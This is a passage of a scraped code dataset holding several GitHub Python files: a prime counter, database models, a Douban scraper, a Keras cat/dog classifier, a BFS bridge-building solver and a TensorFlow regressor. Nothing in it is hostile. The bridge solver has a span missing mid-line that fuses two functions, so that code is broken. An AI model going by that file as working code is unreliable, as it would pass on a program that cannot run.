random_choice.assert_called_once_with(useragents.USER_AGENTS)\n","repo_name":"rpdelaney/downforeveryone","sub_path":"tests/test_useragents/test_useragents.py","file_name":"test_useragents.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"22215927607","text":"from github_search.data_utils import DB, RedisList\nimport fakeredis\n\n\ndef simple_test(d):\n    d['a'] = 1\n    assert d['a'] == 1\n    d['a'] = True\n    assert d['a']\n    d['a'] = {'a' : True}\n    assert d['a']['a']\n    d['a'] = [1, 2, 3]\n    assert d['a'] == [1, 2, 3]\n\nr = fakeredis.FakeStrictRedis()\n#d = DB(write_to='redis', redis_handle=r)\n#simple_test(d)\nsimple_test(DB(write_to='file'))\n","repo_name":"joeystevens00/Github-Explore-Plus","sub_path":"tests/test_redis_utils.py","file_name":"test_redis_utils.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33835624704","text":"# Determine whether n is prime\ndef isprime(n):\n    if n <= 1: return False\n    i = 2\n    while i*i <= n:\n        if n%i == 0: return False\n        i += 1\n    return True\n\n# Return the string form of n written in base k\ndef conv(n, k):\n    s = ''\n    while n:\n        s += str(n%k)\n        n //= k\n    return s[::-1]\n\ndef solution(n, k):\n    s = conv(n,k)\n    cnt = 0\n    for num in s.split('0'):\n        if not num: continue # guard against empty strings: consecutive split tokens leave empty pieces behind\n        if isprime(int(num)): cnt += 1\n    return cnt\n\n\n\n# import math\n\n# def conv(n,k):\n#     ret = []\n#     tmp = 0\n#     while n!=0:\n#         tmp = n%k\n#         ret.append(tmp)\n#         n = n//k\n#     ret = list(map(str,ret))\n#     return \"\".join(reversed(ret))\n\n# def isPrime(n):\n#     if n<2:\n#         return False\n#     elif n==2:\n#         return True\n#     for i in range(3, math.ceil(math.sqrt(n))+1):\n#         if n%i==0:\n#             return False\n#     return True\n\n# def solution(n, k):\n#     answer = 0\n#     ret = conv(n,k)\n#     tmp = \"\"\n#     arr = []\n#     for i in ret:\n#         if i!='0':\n#             tmp+=i\n#         else:\n#             if tmp!=\"\":\n#                 arr.append(int(tmp))\n#             tmp = \"\"\n#     if tmp:\n#         arr.append(int(tmp))\n\n#     for a in arr:\n#         if isPrime(a):\n#             answer+=1\n\n#     return answer\n\nsolution(437674,3)\nsolution(1100011,10)\n# print(\"\")\n\n# How should primality be tested?\n# The maximum is a 20-digit number; can a 20-digit value be tested for primality in time?\n# Building a sieve of Eratosthenes up to that value is not an option either\n# For something like 0111...111 with 19 digits, how do we decide whether it is prime?\n# Checking divisors only up to the square root is enough, since factor pairs mirror around it\n\n","repo_name":"mrsuit0114/algorithmprac","sub_path":"programmers/202304/다시볼것/k진수에서소수개수구하기.py","file_name":"k진수에서소수개수구하기.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21039243595","text":"from peewee import BooleanField, CharField, CompositeKey, DateTimeField, IntegerField, Model, \\\n    MySQLDatabase, fn\n\nfrom tools.configs.db import DB_HOST, DB_NAME, DB_PASSWORD, DB_PORT, DB_USER\n\nprint(f'DB HOST = {DB_HOST}')\n\n\ndbhandle = MySQLDatabase(\n    DB_NAME, user=DB_USER,\n    password=DB_PASSWORD,\n    host=DB_HOST,\n    port=DB_PORT\n)\n\n\nclass BaseModel(Model):\n    class Meta:\n        database = dbhandle\n\n\nclass Report(BaseModel):\n    my_id = IntegerField()\n    target_id = IntegerField()\n    is_offline = BooleanField()\n    latency = IntegerField()\n    stamp = DateTimeField()\n\n\nclass BountyEvent(BaseModel):\n    my_id = IntegerField()\n    tx_dt = DateTimeField()\n    tx_hash = CharField()\n    block_number = IntegerField()\n    bounty = CharField()\n    downtime = IntegerField()\n    latency = IntegerField()\n    gas_used = IntegerField()\n\n    class Meta:\n        db_table = 'bounty_event'\n\n\nclass 
ReportEvent(BaseModel):\n my_id = IntegerField()\n target_id = IntegerField()\n tx_dt = DateTimeField()\n tx_hash = CharField()\n downtime = IntegerField()\n latency = IntegerField()\n gas_used = IntegerField()\n\n class Meta:\n db_table = 'report_event'\n\n\nclass BountyStats(BaseModel):\n tx_hash = CharField()\n eth_balance_before = CharField()\n eth_balance = CharField()\n skl_balance_before = CharField()\n skl_balance = CharField()\n\n class Meta:\n db_table = 'bounty_stats'\n primary_key = CompositeKey('tx_hash')\n\n\n@dbhandle.connection_context()\ndef save_metrics_to_db(my_id, target_id, is_offline, latency):\n \"\"\" Save metrics (downtime and latency) to database\"\"\"\n report = Report(my_id=my_id,\n target_id=target_id,\n is_offline=is_offline,\n latency=latency)\n report.save()\n\n\n@dbhandle.connection_context()\ndef save_bounty_event(tx_dt, tx_hash, block_number, my_id, bounty, downtime, latency, gas_used):\n \"\"\" Save bounty events data to database\"\"\"\n data = BountyEvent(my_id=my_id,\n tx_dt=tx_dt,\n bounty=bounty,\n downtime=downtime,\n latency=latency,\n gas_used=gas_used,\n tx_hash=tx_hash,\n block_number=block_number)\n\n data.save()\n\n\n@dbhandle.connection_context()\ndef save_report_event(tx_dt, tx_hash, my_id, target_id, downtime, latency, gas_used):\n \"\"\" Save bounty events data to database\"\"\"\n data = ReportEvent(my_id=my_id,\n target_id=target_id,\n tx_dt=tx_dt,\n downtime=downtime,\n latency=latency,\n gas_used=gas_used,\n tx_hash=tx_hash)\n\n data.save()\n\n\n@dbhandle.connection_context()\ndef save_bounty_stats(\n tx_hash,\n eth_bal_before,\n skl_bal_before,\n eth_bal,\n skl_bal):\n \"\"\" Save bounty receipt data to database\"\"\"\n data = BountyStats(tx_hash=tx_hash,\n eth_balance_before=eth_bal_before,\n skl_balance_before=skl_bal_before,\n eth_balance=eth_bal,\n skl_balance=skl_bal\n )\n data.save(force_insert=True)\n\n\n@dbhandle.connection_context()\ndef get_month_metrics_for_node(my_id, target_id, start_date, end_date) -> dict:\n \"\"\" Returns a dict with aggregated month metrics - downtime and latency\"\"\"\n\n downtime_results = Report.select(\n fn.SUM(\n Report.is_offline).alias('sum')).where(\n (Report.my_id == my_id) & (\n Report.target_id == target_id) & (\n Report.stamp >= start_date) & (\n Report.stamp <= end_date))\n\n latency_results = Report.select(\n fn.AVG(\n Report.latency).alias('avg')).where(\n (Report.my_id == my_id) & (\n Report.target_id == target_id) & (\n Report.stamp >= start_date) & (\n Report.stamp <= end_date) & (\n Report.latency >= 0))\n if downtime_results[0].sum is None:\n print(f'Sum result from db is None')\n downtime = int(\n downtime_results[0].sum) if downtime_results[0].sum is not None else 0\n latency = latency_results[0].avg if latency_results[0].avg is not None else 0\n return {'downtime': downtime, 'latency': latency}\n\n\n@dbhandle.connection_context()\ndef clear_all_reports():\n nrows = Report.delete().execute()\n print(f'{nrows} records deleted')\n\n\n@dbhandle.connection_context()\ndef clear_all_bounty_receipts():\n nrows = BountyStats.delete().execute()\n print(f'{nrows} records deleted')\n\n\n@dbhandle.connection_context()\ndef get_count_of_bounty_receipt_records():\n return BountyStats.select().count()\n\n\n@dbhandle.connection_context()\ndef get_count_of_report_records():\n return Report.select().count()\n\n\n@dbhandle.connection_context()\ndef get_bounty_max_block_number():\n return 
BountyEvent.select(fn.MAX(BountyEvent.block_number)).scalar()\n","repo_name":"skalenetwork/skale-nms","sub_path":"tools/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"70131428854","text":"import requests\nimport bs4\nimport re\nfrom bs4 import BeautifulSoup\n\n\n\n\ndef getHtmlInfo(url):#获取网页文档\n try:\n # dic={\"start\":\"0\",\"type\":\"T\"}\n r=requests.get(url,timeout=30)\n r.raise_for_status() #根据状态码判断是否访问成功\n \n return r.text\n except:\n return \"出错了!\"\n\n\n\n \ndef selectReadInfo(html,urllist):#图书主页html 获取图书分类信息将图书的类别存到urllist列表中\n soup=BeautifulSoup(html,\"html.parser\")#解析\n lis=[]\n ss=\"\"\n for tag in soup(\"ul\",class_=\"clearfix\"):\n if tag.find(\"li\").string !=None:\n print(str(tag.find(\"li\").string).strip(),\":\\n\")#列表标签分类标题\n for tag_ in tag(\"a\",class_=\"tag\"):#遍历出每个分类里的子分类\n if(str(tag_.string)!=\"更多»\"):\n lis.append(str(tag_.string))\n urllist.append(str(tag_.string))\n for s in lis:\n ss+=s+\"\\t\"\n print(ss,\"\\n\\n\")\n ss=\"\"\n lis=[]\n\n\n\n \ndef searchBook(html,lis,liss):#某个种类的图书排行主页html 图书名称及其链接存入lis字典 图书名称存入liss列表方便用户浏览\n print(\"\\n\\n\\n\")\n soup=BeautifulSoup(html,\"html.parser\")\n for tag in soup(\"div\",class_=\"info\"):\n lis[tag.find(\"a\").attrs[\"title\"]]=tag.find(\"a\").attrs[\"href\"]#图书名和图书链接对应放入字典\n liss.append(tag.find(\"a\").attrs[\"title\"])#图书名称放入列表\n print(tag.find(\"a\").attrs[\"title\"]+\"\\n\"+tag.find(\"div\",class_=\"pub\").string+\"\\n\"+tag.find(\"span\",class_=\"pl\").string+\"\\n\"+tag.find(\"p\").string)\n print(\"\\n\\n\\n\\n\\n\\n\\n\")\n #print(lis)\n\n\n\n \n \ndef bookInfo(html):#某个图书信息的html 爬取出图书的相关信息以及部分精彩短评和长的书评\n #print(html[:200])\n i=5\n soup=BeautifulSoup(html,\"html.parser\")\n s=soup.find(\"div\",id=\"info\")\n for tag_ in s(\"span\",class_=\"pl\"):#爬取图书作者 出品方等信息\n if str(tag_.string)==\"作者:\" or str(tag_.string)==\"丛书:\" or str(tag_.string)==\"出品方:\":\n print(tag_.string,tag_.next_sibling.next_sibling.string)\n else:\n print(tag_.string,tag_.next_sibling)\n print(\"豆瓣评分:\",soup.find(\"strong\").string)\n \n for tag in soup(\"span\",class_=\"rating_per\"):#爬取图书评分\n print(i,\"星:\",tag.string)\n i-=1\n ss=soup.find(\"div\",class_=\"intro\")\n print(\"\\n\\n\\n\")\n print(\"内容简介:\")\n for ta in ss(\"p\"):#爬取图书简介\n print(ta.string)\n print(\"\\n\\n\\n\")\n print(\"章节目录:\")\n so=soup.find(\"div\",style=\"display:none\")\n for t in so(\"br\"):#爬取图书部分目录信息\n print(t.previous_sibling)\n j=1\n print(\"\\n\\n\\n\")\n print(\"部分短评:\\n\\n\")\n for pl in soup(\"p\",class_=\"comment-content\"):#爬取部分精彩短评\n print(j,\":\",pl.string,\"\\n\")\n j+=1\n j=1\n print(\"\\n\\n\\n\")\n print(\"部分书评:\\n\\n\")\n for p in soup(\"div\",class_=\"short-content\"):#爬取部分精彩书评\n print(j,\":\",(((str(p).split(\">\"))[1]).split(\"...\"))[0],\"\\n\")\n j+=1\n #print(p)\n \ndef movie(html):#爬取电影排行\n i=1\n soup=BeautifulSoup(html,\"html.parser\")\n for tag in soup(\"div\",class_=\"pl2\"):#循环遍历出具有电影信息的标签 提取电影信息\n print(i,\":\",str(tag.find(\"a\")).split(\">\")[1].split(\"/\")[0].lstrip().rstrip(),\"\\t地址:\",tag.find(\"a\").attrs[\"href\"],\"\\n\")\n i+=1\n\n \ndef music(html):#爬取音乐排行\n i=1\n soup=BeautifulSoup(html,\"html.parser\")\n for tag in soup(\"li\",class_=\"clearfix\"):#循环遍历出具有歌曲信息的标签 提取歌曲信息\n if i<=10:\n t=tag.find(\"div\")\n print(i,\":\",t.find(\"a\").string)\n #print(t.find(\"p\"))\n print(str(t.find(\"p\")).split(\"/\")[1].split(\"<\")[0].lstrip(),\"\\n\")\n i+=1\n \n\ndef main():\n 
selectP={\"读书\":\"book\",\"音乐\":\"music\",\"电影\":\"movie\",\"退出\":\"break\"}\n    while 1:\n        string=str(input(\"请输入想查看的类别(读书、音乐、电影、退出):\"))\n        print(\"\\n\")\n        if string in selectP.keys():\n            url=\"http://\"+selectP.get(string)+\".douban.com\"# build the url from the user's choice\n            if string==\"读书\":\n                urllist=[]\n                selectReadInfo(getHtmlInfo(url),urllist)# fetch the book category tags\n                #print(\"\\n\")\n                #print(urllist)\n                string=str(input(\"请输入想读的图书种类:\"))\n                string2=int(input(\"请输入想读的页数:\"))\n                if string in urllist and string2<=10:# scrape the requested number of ranking pages for the chosen category\n                    lis={}\n                    liss=[]\n                    for i in range(string2):\n                        url=\"http://book.douban.com/tag/\"+string+\"?start=\"+str(i*20)+\"&type=T\" # url of each page\n                        searchBook(getHtmlInfo(url),lis,liss)# collect book titles and their links\n                    print(\"书单表:\\n\\n\")\n                    print(liss)\n                    print(\"\\n\\n\\n\\n\\n\\n\")\n                    string=str(input(\"请输入想查看的图书名称:\"))\n                    if string in lis.keys():\n                        bookInfo(getHtmlInfo(lis[string]))# fetch the book's details, comments and reviews\n            if string ==\"电影\":\n                url=\"http://movie.douban.com/chart\"\n                movie(getHtmlInfo(url))# scrape part of the movie chart\n            if string ==\"音乐\":\n                url=\"http://music.douban.com/chart\"\n                music(getHtmlInfo(url))# scrape part of the music chart\n            if string ==\"退出\":\n                break\nif __name__==\"__main__\":\n    main()\n","repo_name":"zmyymz/Python","sub_path":"DouB.py","file_name":"DouB.py","file_ext":"py","file_size_in_byte":5787,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"40251126667","text":"import math\n\ndef subP(target, nums):\n    total = left = right = 0\n    mini = math.inf\n    while right < len(nums):\n        total += nums[right]\n        while total >= target:\n            total -= nums[left]\n            left += 1\n            mini = min(mini, right-left+2)\n        right+=1\n    return mini if mini != math.inf else 0\n","repo_name":"Naboni/Competitive-Programming","sub_path":"Week 5/MinSubArrayLen.py","file_name":"MinSubArrayLen.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"72115884532","text":"import pandas as pd\r\nimport numpy as np\r\nfrom keras.preprocessing.image import *\r\nfrom keras.utils import to_categorical\r\nfrom sklearn.model_selection import train_test_split\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nimport os\r\nimport sys\r\n\r\nimport io\r\n\r\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\r\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\r\n\r\n\r\n\r\npath = \"C:/Users/css04/OneDrive/바탕 화면/catdog/\" # path to the data\r\n\r\n# constants describing the image shape\r\nIMAGE_WIDTH=128\r\nIMAGE_HEIGHT=128\r\nIMAGE_SIZE=(IMAGE_WIDTH, IMAGE_HEIGHT)\r\nIMAGE_CHANNEL=3\r\n\r\n# prepare the training data\r\nfilenames = os.listdir(path + \"train\")\r\n# os.listdir() returns a list of every file and directory inside the given directory.\r\ncategories=[]\r\nfor filename in filenames:\r\n    category=filename.split(\".\")[0] # the category is the first token before the '.'\r\n    if category ==\"dog\": # if the name before the '.' is 'dog'\r\n        categories.append(1) # append 1 to the list\r\n    else: # if the category is cat\r\n        categories.append(0) # append 0 to the list\r\ndf = pd.DataFrame(\r\n    {\"filename\":filenames, # filenames come from the directory listing\r\n     \"category\":categories} # pair each filename with its category\r\n)\r\ndf\r\n\r\nsample = random.choice(filenames) # pick one file at random\r\nimage = load_img(path+\"train/\"+sample) # load the selected image from its path\r\nplt.imshow(image) # show the loaded image\r\nfrom keras.models import Sequential\r\n# a Sequential model chains its layers linearly\r\n# you can build a Sequential model by passing layer instances to the constructor\r\nfrom keras.layers import *\r\n# syntactically equivalent to import keras.layers\r\n# imports every module from keras.layers\r\n# from module import 
method/variable\r\n\r\n# layer 1\r\nmodel = Sequential()\r\nmodel.add(Conv2D(32, (3,3), activation=\"relu\", input_shape=(IMAGE_HEIGHT, IMAGE_WIDTH , IMAGE_CHANNEL)))\r\n# build the Sequential model incrementally via the add method\r\n# relu: outputs 0 for inputs <= 0 and passes positive inputs through unchanged\r\nmodel.add(BatchNormalization())\r\n# batch normalization\r\nmodel.add(MaxPooling2D(pool_size=(2,2)))\r\n# why pooling:\r\n# 1. to shrink the image while limiting information loss\r\n# 2. to curb overfitting in the convolutional layers (some argue this framing is odd, since a deep model is in a sense meant to fit aggressively)\r\nmodel.add(Dropout(0.25))\r\n# ignore some nodes during training (prevents overfitting)\r\n\r\n# layer 2\r\nmodel.add(Conv2D(64, (3,3), activation=\"relu\"))\r\nmodel.add(BatchNormalization())\r\nmodel.add(MaxPooling2D(pool_size=(2,2)))\r\nmodel.add(Dropout(0.25))\r\n\r\n# layer 3\r\nmodel.add(Conv2D(128, (3,3), activation=\"relu\"))\r\nmodel.add(BatchNormalization())\r\nmodel.add(MaxPooling2D(pool_size=(2,2)))\r\nmodel.add(Dropout(0.25))\r\n\r\n# Fully Connected\r\nmodel.add(Flatten())\r\nmodel.add(Dense(512, activation='relu'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Dropout(0.5))\r\n\r\nmodel.add(Dense(2,activation=\"softmax\"))\r\n\r\n# compile options\r\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=\"rmsprop\", metrics=['accuracy'])\r\nmodel.summary()\r\n\r\n# ReduceLROnPlateau\r\n# : a callback that reduces the learning rate once the monitored metric stops improving\r\nfrom keras.callbacks import EarlyStopping, ReduceLROnPlateau\r\n\r\nearlystop = EarlyStopping(patience=10)\r\nlearning_rate_reduction=ReduceLROnPlateau(\r\n    monitor= \"val_accuracy\",\r\n    patience = 2,\r\n    factor = 0.5,\r\n    min_lr=0.0001,\r\n    verbose=1)\r\n\r\ncallbacks = [earlystop, learning_rate_reduction]\r\n\r\n# convert the category column to strings so the image generator can use class_mode = \"categorical\"\r\ndf['category']=df['category'].replace({0:'cat',1:\"dog\"})\r\n\r\ntrain_df, validate_df = train_test_split(df , test_size=0.2, random_state= 42)\r\n\r\ntrain_df=train_df.reset_index(drop=True)\r\nvalidate_df=validate_df.reset_index(drop=True)\r\n\r\n\r\ntrain_df['category'].value_counts()\r\n# >>>\r\n# dog    10015\r\n# cat     9985\r\n# Name: category, dtype: int64\r\n\r\nvalidate_df['category'].value_counts()\r\n# >>>\r\n# cat    2515\r\n# dog    2485\r\n# Name: category, dtype: int64\r\n\r\ntotal_train=train_df.shape[0]\r\ntotal_validate=validate_df.shape[0]\r\nbatch_size=15\r\n\r\n# generator settings for the training data\r\ntrain_datagen=ImageDataGenerator(\r\n    rotation_range=15,\r\n    rescale=1./255,\r\n    shear_range=0.1,\r\n    zoom_range=0.2,\r\n    horizontal_flip=True,\r\n    width_shift_range=0.1,\r\n    height_shift_range=0.1)\r\n\r\ntrain_generator=train_datagen.flow_from_dataframe(\r\n    train_df,\r\n    path+\"train\",\r\n    x_col = \"filename\",\r\n    y_col = \"category\",\r\n    target_size = IMAGE_SIZE,\r\n    class_mode = \"categorical\",\r\n    batch_size = batch_size )\r\n\r\nvalidate_datagen=ImageDataGenerator(rescale=1./255)\r\n# validation images, so use the photos as-is\r\n\r\nvalidation_generator=validate_datagen.flow_from_dataframe(\r\n    validate_df,\r\n    path+\"train\",\r\n    x_col= \"filename\",\r\n    y_col= \"category\",\r\n    target_size = IMAGE_SIZE,\r\n    class_mode = \"categorical\",\r\n    batch_size = batch_size )\r\n\r\nexample_df=train_df.sample(n=1).reset_index(drop=True)\r\nexample_df\r\n\r\nexample_generator = train_datagen.flow_from_dataframe(\r\n    example_df,\r\n    path+\"train\",\r\n    x_col = \"filename\",\r\n    y_col = \"category\",\r\n    target_size = IMAGE_SIZE,\r\n    class_mode = \"categorical\")\r\n\r\nplt.figure(figsize=(10,10))\r\nfor i in range(0,15):\r\n    plt.subplot(5,3,i+1)\r\n    for xBatch, yBatch in example_generator:\r\n        image = xBatch[0]\r\n        plt.imshow(image)\r\n        
break\r\nplt.tight_layout()\r\nplt.show()\r\n\r\nepochs = 3\r\n\r\nhistory = model.fit_generator(\r\n    train_generator,\r\n    epochs = epochs,\r\n    steps_per_epoch = total_train//batch_size ,\r\n    validation_data= validation_generator,\r\n    validation_steps = total_validate//batch_size,\r\n    callbacks = callbacks,\r\n)\r\n\r\n# save the model\r\nmodel.save_weights(\"model.h5\")\r\n\r\nhistoryDict=history.history\r\n\r\nacc=history.history['accuracy']\r\nval_acc=history.history['val_accuracy']\r\nloss=history.history['loss']\r\nval_loss=history.history['val_loss']\r\n\r\nepo = range(1, len(acc)+1)\r\nplt.plot(epo, loss, 'bo', label=\"Training loss\")\r\nplt.plot(epo, val_loss, 'b', label=\"Val loss\")\r\nplt.xlabel(\"epoch\")\r\nplt.ylabel(\"Loss\")\r\nplt.legend()\r\nplt.show()\r\n\r\nplt.plot(epo, acc, 'ro', label=\"Training accuracy\")\r\nplt.plot(epo, val_acc, 'r', label=\"Val accuracy\")\r\nplt.xlabel(\"epoch\")\r\nplt.ylabel(\"Accuracy\")\r\nplt.legend()\r\nplt.show()\r\n\r\n# build the test dataframe (the test images have no labels)\r\ntest_filenames = os.listdir(path + \"test\")\r\ntest_df = pd.DataFrame({'filename': test_filenames})\r\nnbsamples = test_df.shape[0]\r\n\r\ntest_datagen=ImageDataGenerator(rescale=1./255)\r\n# test images, so use the photos as-is\r\ntest_generator=test_datagen.flow_from_dataframe(\r\n    test_df,\r\n    path+\"test\",\r\n    x_col= \"filename\",\r\n    y_col= None,\r\n    target_size = IMAGE_SIZE,\r\n    class_mode = None,\r\n    batch_size = batch_size,\r\n    shuffle = False)\r\n\r\n# 3. prediction\r\npredict=model.predict_generator(test_generator,\r\n                                steps=nbsamples/batch_size,\r\n                                callbacks=callbacks)\r\n\r\ntest_df['category']=np.argmax(predict, axis=1)\r\n\r\ntest_df['category']=test_df['category'].replace({0:'cat',1:\"dog\"})\r\nex_df=test_df.sample(n=1).reset_index(drop=True)\r\nex_df\r\n\r\nex_generator = test_datagen.flow_from_dataframe(\r\n    ex_df,\r\n    path+\"test\",\r\n    x_col = \"filename\",\r\n    y_col = None,\r\n    target_size = IMAGE_SIZE,\r\n    class_mode = None)\r\ntest_sample=list(ex_df.filename)\r\n\r\nsample = \"\"\r\nfor test in test_sample:\r\n    sample += test\r\nimage = load_img(path+\"test/\"+sample)\r\nplt.figure(figsize=(8,8))\r\nplt.imshow(image)\r\n\r\nplt.tight_layout()\r\nplt.show()\r\n\r\nsampleSubmission=pd.read_csv(path+\"sampleSubmission.csv\", dtype=\"object\")\r\nsampleSubmission\r\n\r\nindex=[]\r\nfor filename in test_df.filename:\r\n    li=filename.split(\".\")[0]\r\n    index.append(li)\r\n\r\ntest_df[\"id\"]=index\r\n\r\nfinal=test_df.merge(sampleSubmission)[['id','category']]\r\nfinal['id']=final['id'].astype(\"int64\")\r\nfinal=final.sort_values(\"id\")\r\n\r\nfinal.rename({'category':\"label\"},axis='columns').to_csv(\"Submission.csv\", index=False)\r\n","repo_name":"css04146/image_classification","sub_path":"catdog.py","file_name":"catdog.py","file_ext":"py","file_size_in_byte":8798,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"20907928555","text":"# I got stuck on the part that picks and sums the minimal bridges, so I consulted the answer\n# labeled islands and laid bridges with BFS, then got the minimal bridge length with Kruskal's MST\n\"\"\"\nFind the minimal total bridge length that connects every island\n\nConstraints\n1. Print -1 if connecting all islands is impossible\n2. A bridge must be at least 2 long\n3. A bridge cannot change direction midway\n\nIDEA\n1. Start a BFS from the first land cell encountered\n store it as 'dictionary[(x, y)] = island number'\n2. Walk the island dictionary with BFS and lay bridges\n3. 
find the minimal total bridge length with Kruskal's MST\n\"\"\"\n\nimport sys, collections\nfrom collections import deque\nsys.stdin = open(\"BFS/input.txt\",'r')\ninput = sys.stdin.readline\n\n# vertical size N and horizontal size M\nn, m = map(int, input().strip().split())\n\n# island dictionary\nislandNum = 0 # island counter - used as a dictionary key / 2 ≤ number of islands ≤ 6\nisland = collections.defaultdict(list)\nlandArr = []\n\n# the map\nMAP = [list(map(int, input().strip().split())) for _ in range(n)]\n\n# direction offsets\nmove = [(0,1),(1,0),(0,-1),(-1,0)]\n\n# find land via BFS starting from (a, b)\ndef bfs_find_island(a, b):\n    global islandNum\n    # mark as visited\n    visited[a][b] = True\n    # create the queue\n    q = deque([(a, b)]) # append the start cell to the queue\n    # update the dictionary\n    island[(a, b)] = islandNum\n    landArr.append((a, b, islandNum))\n    # start BFS\n    while q:\n        x, y = q.popleft() # pop the next cell\n        for a, b in move: # look for land in the four directions\n            nx, ny = x+a, y+b\n            # if the new cell is inside the map and is not sea\n            if 0<=nxnx>=0 and m>ny>=0:\n                toLand = island.get((nx,ny))\n                # same island\n                if curLand==toLand:\n                    break\n                # over the sea, bridge length +1\n                if toLand == None:\n                    nx+=a; ny+=b\n                    dist+=1\n                    continue\n                # bridge too short\n                if dist < 2:\n                    break\n                # reaching another island finishes the bridge\n                edges.append((dist,curLand,toLand))\n                break\n            else:\n                break\nedges = sorted(edges,reverse=True)\n\n# run Kruskal's MST\ndef union(x,y):\n    x, y = find(x), find(y)\n    if x!=y:\n        if x>y:\n            parents[x] = y\n        else:\n            parents[y] = x\n\ndef find(k):\n    if k == parents[k]:\n        return k\n    parents[k] = find(parents[k])\n    return parents[k]\n\nans = 0\ncnt = islandNum-1\nparents = [i for i in range(islandNum)]\nwhile cnt:\n    try:\n        w,a,b = edges.pop()\n    except:\n        # when no stored bridges are left\n        print(-1)\n        exit(0)\n    if find(a) != find(b): # minimal total bridge length connecting all islands\n        union(a,b)\n        ans += w\n        cnt-=1\nprint(ans)\n\n","repo_name":"Suyeon-B/week03_team","sub_path":"suyeon/BFS/17472 다리 만들기 2 retry.py","file_name":"17472 다리 만들기 2 retry.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"27084830206","text":"#!/usr/bin/python\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport itertools, tensorflow as tf, numpy as np, pandas as pd\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\nCOLUMNS=['AsofYear','RespondentID','AgencyCode','LoanType','PropertyType','LoanPurpose','Occupancy','LoanAmount000s','Preapproval','ActionType','MSAMD','StateCode','CountyCode','CensusTractNumber','ApplicantEthnicity','CoApplicantEthnicity','ApplicantRace1','ApplicantRace2','ApplicantRace3','ApplicantRace4','ApplicantRace5','CoApplicantRace1','CoApplicantRace2','CoApplicantRace3','CoApplicantRace4','CoApplicantRace5','ApplicantSex','CoApplicantSex','ApplicantIncome000s','PurchaserType','DenialReason1','DenialReason2','DenialReason3','RateSpread','HOEPAStatus','LienStatus','EditStatus','SequenceNumber','Population','MinorityPopulationPct','FFIECMedianFamilyIncome','TracttoMSAMDIncomePct','NumberofOwner-occupiedunits','Numberof1-to4-Familyunits','ApplicationDateIndicator']\n\nFEATURES=['AsofYear','AgencyCode','LoanType','PropertyType','LoanPurpose','Occupancy','Preapproval','ActionType','MSAMD','StateCode','CountyCode','CensusTractNumber','ApplicantEthnicity','CoApplicantEthnicity','ApplicantRace1','CoApplicantRace1','ApplicantSex','CoApplicantSex','ApplicantIncome000s','PurchaserType','HOEPAStatus','LienStatus','SequenceNumber','Population','MinorityPopulationPct','FFIECMedianFamilyIncome','TracttoMSAMDIncomePct','ApplicationDateIndicator']\n\nLABEL=['LoanAmount000s']\n\ntraining_set = 
pd.read_csv(\"data/training_CHI.csv\", names=COLUMNS)\ntesting_set = pd.read_csv(\"data/test_LAX.csv\", names=COLUMNS)\nprediction_set = pd.read_csv(\"data/prediction_NYC.csv\", names=COLUMNS)\n\nfeature_cols = [tf.feature_column.numeric_column(k) for k in FEATURES]\n\nregressor = tf.estimator.DNNRegressor(feature_columns=feature_cols,\n                                      hidden_units=[10, 10])\n\ndef get_input_fn(data_set, num_epochs=None, shuffle=True):\n    return tf.estimator.inputs.pandas_input_fn(\n        x=pd.DataFrame({k: data_set[k].values for k in FEATURES}),\n        y = pd.Series(data_set[LABEL[0]].astype(int)),\n        num_epochs=num_epochs,\n        shuffle=shuffle)\n\nregressor.train(input_fn=get_input_fn(training_set), steps=5)\n\nev = regressor.evaluate(\n    input_fn=get_input_fn(testing_set, num_epochs=1, shuffle=False))\n\nloss_score = ev[\"loss\"]\nprint(\"Loss: {0:f}\".format(loss_score))\n\ny = regressor.predict(\n    input_fn=get_input_fn(prediction_set, num_epochs=1, shuffle=False))\n# .predict() returns an iterator of dicts; convert to a list and print\n# predictions\npredictions = list(p[\"predictions\"] for p in itertools.islice(y, 6))\nprint(\"Predictions: {}\".format(str(predictions)))\n\n","repo_name":"manubhardwaj/tensorflow-demo","sub_path":"hmda/hmda.py","file_name":"hmda.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
